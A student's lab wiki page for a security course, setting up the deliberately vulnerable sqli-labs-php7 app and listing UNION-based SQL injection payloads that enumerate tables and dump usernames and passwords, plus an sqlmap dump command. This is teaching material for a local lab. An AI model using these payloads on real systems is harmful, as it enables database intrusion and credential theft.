Lab 9.1: SQLi Review - squatchulator/Tech-Journal GitHub Wiki

Lab 9.1 - SQLi Review

Configure MySQLi

sudo systemctl enable mysqld
sudo systemctl start mysqld
sudo mysql_secure_installation

## Enter root password (I think it can be anything?)
## Enter 'n' for unix_socket authentication, 'y' for the rest.

mkdir -p ~/Documents/SEC-335/Week9
cd ~/Documents/SEC-335/Week9
git clone
cd sqli-labs-php7

Add the following to sql-connections/

$dbuser ='root';
$dbpass ='<password>'; NOTE: this needs to be the same password you set up MySQL with
$dbname ="security";
$host ='localhost';
$dbname1 ="challenges";
  • Start the application (from the directory we created above: /Documents/SEC-335/Week9/sqli-labs-php7) with php -S -t .
  • Now you should be able to visit via the web browser.
  • Edit the file /Documents/SEC-335/Week9/sqli-labs-php7/Less-1/index.php and add the following:
Beneath "include("../sql-connections/sqli-connect.php");...

ini_set('display_errors', 1);

Beneath "$row = msqli_fetch_array($result ,MYSQLI_BOTH);...
printf("<br>raw_sql: %s<br>", $sql);
  • Now, start the SQL server back up and navigate to it via the web browser.
  1. Display the Login name and password for arbitrary user
  1. Error condition when number of columns are exceeded
  •’ union select 1,2–-+
  1. A Union select that displays your own value for login name and password
  •' union select 1,user(),database()%20--+
  1. Another union that displays the mysql user and database
  •' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()--+
  1. A union that dumps all the tables in the current database
  1. A union that dumps all the usernames and passwords
  •' union select 1,group_concat(username),group_concat(password) from users --+
  1. Figure out how to run sqlmap against the vulnerable uri:
  • Run this using Medium Difficulty and Intermediate Enumeration.
  • Figure out how to dump the contents of the users table in the security database.
  • Provide a screenshot showing the results of dumping the user's table.
    • sqlmap -u -T users --level 2 --risk 2 --dump
    • Say yes to all prompts
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